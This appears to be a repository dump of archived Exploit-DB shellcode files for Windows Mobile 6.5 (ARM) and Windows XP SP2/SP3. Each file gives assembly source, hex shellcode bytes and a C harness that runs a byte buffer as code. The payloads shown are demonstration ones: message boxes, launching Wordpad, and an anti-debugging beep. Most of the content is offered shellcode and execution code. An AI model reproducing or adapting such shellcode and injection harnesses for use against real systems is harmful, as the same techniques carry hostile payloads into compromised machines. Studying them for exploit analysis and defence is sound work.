| 00011028: E1A0F00C mov pc, r12 55 | 0001102C: 00650063 rsbeq r0, r5, r3, rrx 56 | 00011030: 006C006C rsbeq r0, r12, r12, rrx 57 | 00011034: 006F0063 rsbeq r0, pc, r3, rrx 58 | 00011038: 00650072 rsbeq r0, r5, r2, ror r0 59 | 0001103C: 00000000 andeq r0, r0, r0 60 | 00011040: 00310033 eoreqs r0, r1, r3, lsr r0 61 | 00011044: 00330033 eoreqs r0, r3, r3, lsr r0 62 | 00011048: 00000037 andeq r0, r0, r7, lsr r0 63 | 0001104C: 03F6272C 64 | 00011050: 02E806DC rsceq r0, r8, #0xDC, 12 65 | 66 | 67 | "i don't think we have any imperfections; we perfectly are what we are." 68 | 69 | */ 70 | 71 | #include 72 | #include 73 | 74 | int shellcode[] = 75 | { 76 | 0xE59FC044, 77 | 0xE28F0020, 78 | 0xE1A0E00F, 79 | 0xE1A0F00C, 80 | 0xE59FC038, 81 | 0xE28F0024, 82 | 0xE3A03000, 83 | 0xE3A02000, 84 | 0xE3A01000, 85 | 0xE1A0E00F, 86 | 0xE1A0F00C, 87 | 0x00650063, 88 | 0x006C006C, 89 | 0x006F0063, 90 | 0x00650072, 91 | 0x00000000, 92 | 0x00310033, 93 | 0x00330033, 94 | 0x00000037, 95 | 0x03F6272C, 96 | 0x02E806DC, 97 | }; 98 | 99 | int WINAPI WinMain( HINSTANCE hInstance, 100 | HINSTANCE hPrevInstance, 101 | LPTSTR lpCmdLine, 102 | int nCmdShow) 103 | { 104 | ((void (*)(void)) & shellcode)(); 105 | 106 | return 0; 107 | } -------------------------------------------------------------------------------- /Windows/Windows_Mobile_6_5_TR__WinCE_5_2__-_MessageBox_Shellcode__ARM___Shellcode_exploit_for_Windows_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | Device: HTC Touch2 4 | System: Windows Mobile 6.5 TR (WinCE 5.0.2) 5 | 6 | Addresses of functions can be different on different devices so , you can edit the functions addresses. 7 | 8 | Coded by Celil Ünüver from SecurityArchitect 9 | 10 | Contact: 11 | celilunuver[n*spam]gmail.com 12 | www.securityarchitect.org 13 | blog.securityarchitect.org 14 | 15 | EXPORT start 16 | AREA .text, CODE 17 | start 18 | eor r0, r0, r0 19 | eor r1, r1, r1 20 | eor r2, r2, r2 21 | eor r3, r3, r3 22 | ldr R12, =0x3f6272c ; LoadLibrary Address 23 | adr r0, lib ; library name {coredll.dll} 24 | mov lr, pc 25 | mov pc, r12 26 | ldr r12, =0x3f7c15c ; MessageBox Address 27 | mov r0, #0 28 | adr r1, mes 29 | adr r2, mes 30 | mov R3, #0 31 | mov lr, pc 32 | mov pc, r12 33 | 34 | lib dcb "c",0,"o",0,"r",0,"e",0,"d",0,"l",0,"l",0,".",0,"d",0,"l",0,"l",0,0,0 35 | mes dcb "o",0,"w",0,"n",0,"z",0,0,0 36 | ALIGN 37 | END 38 | */ 39 | 40 | #include 41 | #include 42 | 43 | int shellcode[] = 44 | { 45 | 0xE0200000, 46 | 0xE0211001, 47 | 0xE0222002, 48 | 0xE0233003, 49 | 0xE59FC048, 50 | 0xE28F0020, 51 | 0xE1A0E00F, 52 | 0xE1A0F00C, 53 | 0xE59FC03C, 54 | 0xE3A00000, 55 | 0xE28F1024, 56 | 0xE28F2020, 57 | 0xE3A03000, 58 | 0xE1A0E00F, 59 | 0xE1A0F00C, 60 | 0x006F0063, 61 | 0x00650072, 62 | 0x006C0064, 63 | 0x002E006C, 64 | 0x006C0064, 65 | 0x0000006C, 66 | 0x0077006F, 67 | 0x007A006E, 68 | 0x00000000, 69 | 0x03F6272C, 70 | 0x03F7C15C, 71 | }; 72 | 73 | int WINAPI WinMain( HINSTANCE hInstance, 74 | HINSTANCE hPrevInstance, 75 | LPTSTR lpCmdLine, 76 | int nCmdShow) 77 | { 78 | ((void (*)(void)) & shellcode)(); 79 | 80 | return 0; 81 | } -------------------------------------------------------------------------------- /Windows/Windows_XP_Professional_SP2__English__-_MessageBox_Null-Free_Shellcode__16_bytes___Shellcode_exploit_for_Windows_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | +-----------------------------------------------------+ 2 | | Windows XP Pro Sp2 English "Message-Box" Shellcode. | 3 | +-----------------------------------------------------+ 4 | 5 | Size : 16 Bytes, Null-Free. 6 | Author : Aodrulez. 7 | Email : f3arm3d3ar@gmail.com 8 | 9 | 10 | 11 | Shellcode = "\xB9\x78\x68\x82\x7C\x33\xC0\xBB" 12 | "\xF8\x0C\x86\x7C\x51\x50\xFF\xD3" 13 | 14 | 15 | 16 | 17 | +--------------+ 18 | | Description: | 19 | +--------------+ 20 | 21 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 22 | I've used a Function called "FatalAppExit". 23 | The Benefits are Three-Fold! 24 | 25 | 1] Displays a MessageBox. 26 | 2] Terminates the Process. 27 | 3] Its there in Kernel32.dll itself. 28 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 29 | 30 | 31 | 32 | 33 | 34 | +-----------+ 35 | | Asm Code: | 36 | +-----------+ 37 | 38 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 39 | shellcode: 40 | mov ecx,7c826878h ;"Admin" string in mem 41 | xor eax,eax 42 | mov ebx,7c860cf8h ;Addr of "FatalAppExit()" 43 | push ecx ;function from Kernel32 44 | push eax 45 | call ebx ;App does a Clean Exit. 46 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 47 | 48 | 49 | 50 | 51 | 52 | 53 | +-----------------+ 54 | | Shellcodetest.c | 55 | +-----------------+ 56 | 57 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 58 | 59 | char code[] = "\xB9\x78\x68\x82\x7C\x33\xC0\xBB" 60 | "\xF8\x0C\x86\x7C\x51\x50\xFF\xD3"; 61 | 62 | 63 | 64 | 65 | int main(int argc, char **argv) 66 | { 67 | 68 | int (*func)(); 69 | func = (int (*)()) code; 70 | (int)(*func)(); 71 | } 72 | 73 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 74 | 75 | 76 | 77 | +-------------------+ 78 | | Greetz Fly Out To | 79 | +-------------------+ 80 | 81 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 82 | 1] Amforked() : My Mentor. 83 | 2] The Blue Genius : My Boss. 84 | 3] www.orchidseven.com 85 | 4] str0ke 86 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 87 | 88 | +---------------------------------------------+ 89 | | Forgive, O Lord, My Little Jokes on Thee, | 90 | | and I'll Forgive Thy Great Big Joke on Me. | 91 | +---------------------------------------------+ -------------------------------------------------------------------------------- /Windows/Windows_XP_Professional_SP2__English__-_Wordpad_Null-Free_Shellcode__12_bytes___Shellcode_exploit_for_Windows_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | +-------------------------------------------------+ 2 | | Windows XP Pro Sp2 English "Wordpad" Shellcode. | 3 | +-------------------------------------------------+ 4 | 5 | Size : 12 Bytes,Null Free. 6 | Author : Aodrulez. 7 | Email : f3arm3d3ar@gmail.com 8 | Milw0rm : www.milw0rm.com/author/1620 9 | 10 | Shellcode = "\x68\x87\x4c\x80\x7c\xb8" 11 | "\x6d\x13\x86\x7c\xff\xd0" 12 | 13 | +-----------------+ 14 | | Shellcodetest.c | 15 | +-----------------+ 16 | 17 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 18 | char code[] = "\x68\x87\x4c\x80\x7c\xb8" 19 | "\x6d\x13\x86\x7c\xff\xd0"; 20 | 21 | 22 | int main(int argc, char **argv) 23 | { 24 | 25 | int (*func)(); 26 | func = (int (*)()) code; 27 | (int)(*func)(); 28 | } 29 | 30 | 31 | 32 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 33 | 34 | +-------------------+ 35 | | Greetz Fly Out To | 36 | +-------------------+ 37 | 38 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 39 | 1] Amforked() : My Mentor. 40 | 2] The Blue Genius : My Boss. 41 | 3] www.orchidseven.com 42 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -------------------------------------------------------------------------------- /Windows/Windows_XP_SP2_-_PEB_ISbeingdebugged_Beep_Shellcode__56_bytes___Shellcode_exploit_for_Windows_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | #name: win xp sp2 PEB ISbeingdebugged shellcode 2 | 3 | #Author: Anonymous 4 | 5 | #Date: 14.12.2009. 6 | 7 | here is the ASM code made using masm32 8 | 9 | 10 | if program is being run under debugger the shellcode wil start beeping :D 11 | //////////////////////begin/////////////////////////////////////// 12 | 13 | .386 14 | .model flat, stdcall 15 | option casemap :none 16 | INCLUDE C:\MASM32\INCLUDE\WINDOWS.INC 17 | INCLUDE C:\MASM32\INCLUDE\KERNEL32.INC 18 | INCLUDE C:\MASM32\INCLUDE\USER32.INC 19 | INCLUDE C:\MASM32\INCLUDE\MASM32.INC 20 | INCLUDELIB C:\MASM32\LIB\KERNEL32.LIB 21 | INCLUDELIB C:\MASM32\LIB\USER32.LIB 22 | INCLUDELIB C:\MASM32\LIB\MASM32.LIB 23 | 24 | 25 | .data 26 | ExitMsg DB "Enter to Exit", 0 27 | 28 | .code 29 | start: 30 | assume fs:nothing 31 | mov eax,fs:[30h] 32 | mov eax, [eax+02h] 33 | mov ebx, 7FFF8000h 34 | add ebx,7FFF8000h 35 | inc ebx 36 | push 300h 37 | push 200h 38 | mov edx,7c837a8fh 39 | cmp eax,ebx 40 | jnz exit 41 | call edx 42 | exit: 43 | invoke ExitProcess,NULL 44 | 45 | 46 | end start 47 | 48 | 49 | /////////////////////////////end/////////////////////////////// 50 | 51 | here is the dump of code using olly debugger 52 | 53 | 54 | 00401000 >/$ 64:A1 30000000 MOV EAX,DWORD PTR FS:[30] 55 | 00401006 |. 8B40 02 MOV EAX,DWORD PTR DS:[EAX+2] 56 | 00401009 |. BB 0080FF7F MOV EBX,7FFF8000 57 | 0040100E |. 81C3 0080FF7F ADD EBX,7FFF8000 58 | 00401014 |. 43 INC EBX 59 | 00401015 |. 68 00030000 PUSH 300 ; /Duration = 768. ms 60 | 0040101A |. 68 00020000 PUSH 200 ; |Frequency = 200 (512.) 61 | 0040101F |. BA 8F7A837C MOV EDX,kernel32.Beep ; | 62 | 00401024 |. 3BC3 CMP EAX,EBX ; | 63 | 00401026 |. 75 02 JNZ SHORT antidebu.0040102A ; | 64 | 00401028 |. FFD2 CALL EDX ; \Beep 65 | 0040102A |> 6A 00 PUSH 0 ; /ExitCode = 0 66 | 0040102C \. E8 01000000 CALL ; \ExitProcess 67 | 00401031 CC INT3 68 | 00401032 .-FF25 00204000 JMP DWORD PTR DS:[<&kernel32.ExitProcess>; kernel32.ExitProcess 69 | 70 | 71 | 72 | 73 | 74 | 75 | here is the shellcode 76 | \x64\xA1\x30\x00\x00\x00\x8B\x40\x02\xBB\x00\x80\xFF\x7F\x81\xC3\x00\x80\xFF\x7F\x43\x68\x00\x03\x00\x00\x68\x00\x02\x00\x00\xBA\x8F\x7A\x83\x7C\x3B\xC3\x75\x02\xFF\xD2\x6A\x00\xE8\x01\x00\x00\x00\xCC\xFF\x25\x00\x20\x40\x00 -------------------------------------------------------------------------------- /Windows/Windows_XP_SP3__English__-_MessageBoxA_Shellcode__87_bytes___Shellcode_exploit_for_Windows_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title: Windows XP SP3 English MessageBoxA Shellcode (87 bytes) 3 | Date: August 20, 2010 4 | Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com) 5 | Tested on: Windows XP SP3 En 6 | Thanks: ishtus 7 | Greetz: Astalavista, OffSEC, Exploit-DB 8 | 9 | Exploit-DB Notes: 10 | Tested under Windows XP SP3 Eng 11 | The correct memory address for GetProcAddress() appears to be different on our test machine, 12 | which is 0x7c80ae30. 13 | */ 14 | 15 | #include 16 | 17 | char shellcode[] = 18 | "\x31\xc0\x31\xdb\x31\xc9\x31\xd2" 19 | "\x51\x68\x6c\x6c\x20\x20\x68\x33" 20 | "\x32\x2e\x64\x68\x75\x73\x65\x72" 21 | "\x89\xe1\xbb\x7b\x1d\x80\x7c\x51" // 0x7c801d7b ; LoadLibraryA(user32.dll) 22 | "\xff\xd3\xb9\x5e\x67\x30\xef\x81" 23 | "\xc1\x11\x11\x11\x11\x51\x68\x61" 24 | "\x67\x65\x42\x68\x4d\x65\x73\x73" 25 | "\x89\xe1\x51\x50\xbb\x40\xae\x80" // 0x7c80ae40 ; GetProcAddress(user32.dll, MessageBoxA) 26 | "\x7c\xff\xd3\x89\xe1\x31\xd2\x52" 27 | "\x51\x51\x52\xff\xd0\x31\xc0\x50" 28 | "\xb8\x12\xcb\x81\x7c\xff\xd0"; // 0x7c81cb12 ; ExitProcess(0) 29 | 30 | int main(int argc, char **argv) 31 | { 32 | int (*func)(); 33 | func = (int (*)()) shellcode; 34 | printf("Shellcode Length is : %d",strlen(shellcode)); 35 | (int)(*func)(); 36 | 37 | } -------------------------------------------------------------------------------- /getItem.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WangYihang/ShellcodeSpider/55cf38010b85151ddb4ad10edd2f278ec737ec33/getItem.pyc --------------------------------------------------------------------------------